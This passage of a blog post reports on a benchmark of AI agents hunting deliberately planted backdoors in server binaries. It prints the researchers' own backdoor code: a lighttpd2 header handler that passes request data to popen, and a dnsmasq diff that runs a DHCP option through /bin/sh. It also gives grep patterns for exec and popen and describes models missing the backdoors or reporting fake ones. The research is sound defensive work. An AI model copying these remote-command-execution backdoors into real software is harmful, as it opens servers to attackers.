char *debugIn = LI_HEADER_VALUE(hh);
FILE *fp = popen(debugIn, “r”); // Execute attacker’s command
// … read output into debugOut …
pclose(fp);
li_http_header_insert(con->mainvr->response.headers,
CONST_STR_LEN(“X-Request-Trace”), debugOut, strlen(debugOut));
return TRUE;
For a user who downloaded this backdoored server, it would seem like this is a legitimate program. However, an attacker could trivially execute any command by sending a specially crafted packet.
Here’s how Claude did it:
Step 1. The model identified the binary and its 26 shared libraries — one of which contained the backdoor.
Step 2. Next, it ran strings with grep patterns looking for obvious indicators of a backdoor:
strings bin/lighttpd2-worker | grep -iE ‘(shell|bash|/bin/sh|exec|system|backdoor)’
However, the command didn’t find anything suspicious. The model expanded the search to all shared libraries, looking for more patterns (hardcoded IPs, suspicious commands, and credential patterns). Still nothing obvious.
Step 3. Claude switched strategies and used nm -D to list imported functions:
for f in lib/*.so; do
nm -D “$f” | grep -E ′ U (system|exec|popen)′
done
lib/liblighttpd2-shared-2.0.0.so: U popen@GLIBC_2.2.5
Claude detected that one of the libraries that the server uses imports popen(): function used to execute shell commands. It immediately alarmed the model:
Step 4. Claude investigated further to determine if the function was truly malicious, using the Radare2 decompiler for analysis.
It first identified which function calls popen():
r2 -q -c ‘aaa; axt @ sym.imp.popen’ lib/liblighttpd2-shared-2.0.0.so
The output of this command revealed that a function called li_check_debug_header does shell execution. (That’s the backdoor we added!). The model smelled something fishy:
Then using Radare2’s decompiler, the model examined the function:
r2 -q -c ‘aaa; s dbg.li_check_debug_header; pdc’ lib/liblighttpd2-shared-2.0.0.so
The decompiled pseudocode allowed the LLM to understand how the backdoor works — it looks for an undocumented HTTP header X-Forwarded-Debug and if it’s present executes an attacker-provided command. The server conveniently sends the command output back in a X-Request-Trace response header.
Step 5. Finally, Claude used Radare2 to confirm the function wasn’t dead code, checking cross-references to ensure it was called from the main program:
r2 -q -c ‘aaa; s 0x00015260; pd 10’ lib/liblighttpd2-shared-2.0.0.so
Now being confident that it found a real backdoor, Claude reported those findings back and finished the exploration.
However, LLMs very often miss even obvious backdoors.
We took dnsmasq — a widely-used DNS/DHCP server — and added an embarrassingly obvious backdoor. We weren’t even trying to hide it: if DHCP option 224 (undocumented, we made it up) is present in a packet, execute its contents as a shell command via execl(“/bin/sh”, “sh”, “-c”, buf, NULL).
The backdoor we added was just 7 lines of C in DHCP packet parsing:
/* existing DHCP option handling */
match_vendor_opts(opt, daemon->dhcp_opts);
+ if (opt = option_find(mess, sz, 224, 1)) {
+ char buf[256];
+ int len = option_len(opt);
+ memcpy(buf, option_ptr(opt, 0), len);
+ buf[len] = ‘\0’;
+ execl(“/bin/sh”, “sh”, “-c”, buf, NULL);
Even the best model in our benchmark got fooled by this task. Claude Opus 4.6 found /bin/sh in the strings output early on, traced it to the exact function containing the backdoor, and saw the execl(“/bin/sh”, “sh”, “-c”, …) call. Then it simply assumed it was normal:
It examined the function, but concluded:
The model found the exact function, saw the exact execl call with /bin/sh -c — and rationalized it away as “legitimate DHCP script execution.” It never checked where the command string actually comes from (a DHCP packet from client). It then moved on to investigate other functions and never circled back.
The executables in our benchmark often have hundreds or thousands of functions — while the backdoors are tiny, often just a dozen lines buried deep within. Finding them requires strategic thinking: identifying critical paths like network parsers or user input handlers and ignoring the noise.
Current LLMs lack this high-level intuition. Instead of prioritizing high-risk areas, they often decompile random functions or grep for obvious keywords like system() or exec(). When simple heuristics fail, models frequently hallucinate or give up entirely.
This lack of focus leads them down rabbit holes. We observed agents fixating on legitimate libraries — treating them as suspicious anomalies. They wasted their entire context window auditing benign code while the actual backdoor remained untouched in a completely different part of the binary.
The security community is drowning in AI-generated noise. The curl project recently stopped paying for bug reports partly because of AI slop:
The vast majority of AI-generated error reports submitted to cURL are pure nonsense.
A security tool which gives you fake reports is useless and frustrating to use. We specifically tested for this with negative tasks — clean binaries with no backdoor. We found that 28% of the time models reported backdoors or issues that weren’t real. For any practical malware detection software, we expect a false positive rate of less than 0.001%, as most software is safe, vide false positive paradox.
For example, Gemini 3 Pro supposedly “discovered” a backdoor in… command-line argument parsing in one of the servers:
In reality, the source code correctly validates and parses the command-line argument as a number. It never attempts to execute it. Several “findings” that the model reported are completely fake and missing from the source code.
We restricted agents to open-source tools: Ghidra and Radare2. We verified that frontier models (including Claude Opus 4.6 and Gemini 3 Pro) achieve a 100% success rate at operating them — correctly loading binaries and running basic commands.
However, these open-source decompilers lag behind commercial alternatives like IDA Pro. While they handle C binaries well, they have issues with Rust (though agents managed to solve some tasks), and fail completely with Go executables.
For example, we tried to work with Caddy, a web server written in Go, with a binary weighing 50MB. Radare2 loaded in 6 minutes but produced poor quality code, while Ghidra not only took 40 minutes just to load, but was not able to return correct data. At the same time, IDA Pro loaded in 5 minutes, giving correct, usable code, sufficient for manual analysis.
To ensure we measure agent intelligence rather than tool quality, we excluded Go binaries and focused mostly on C executables (and one Rust project) where the tooling is reliable.
Can AI find backdoors in binaries? Sometimes. Claude Opus 4.6 solved 49% of tasks, while Gemini 3 Pro solved 44% and Claude Opus 4.5 solved 37%.
As of now, it is far from being useful in practice — we would need a much higher detection rate and a much lower false positive rate to make it a viable end-to-end solution.
It works on small binaries and when it sees unexpected patterns. At the same time, it struggles with larger files or when backdoors mimic legitimate access routes.
While end-to-end malware detection is not reliable yet, AI can make it easier for developers to perform initial security audits. A developer without reverse engineering experience can now get a first-pass analysis of a suspicious binary.
A year ago, models couldn’t reliably operate Ghidra. Now they can perform genuine reverse engineering — loading binaries, navigating decompiled code, tracing data flow.
The whole field of working with binaries becomes accessible to a much wider range of software engineers. It opens opportunities not only in security, but also in performing low-level optimization, debugging and reverse engineering hardware, and porting code between architectures.
We believe that results can be further improved with context engineering (including proper skills or MCP) and access to commercial reverse engineering software (such as the mentioned IDA Pro and Binary Ninja).
Once AI demonstrates the capability to solve some tasks (as it does now), subsequent models usually improve drastically.
Moreover, we expect that a lot of analysis will be performed with local models, likely fine-tuned for malware detection. Security-sensitive organizations can’t upload proprietary binaries to cloud services. Additionally, bad actors will optimize their malware to evade public models, necessitating the use of private, local models for effective defense.
You can check full results and see the tasks at QuesmaOrg/BinaryAudit.
...
Read the original on quesma.com »
This website requires javascript to properly function. Consider activating javascript to get access to all site functionality.
...
Read the original on www.lesswrong.com »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.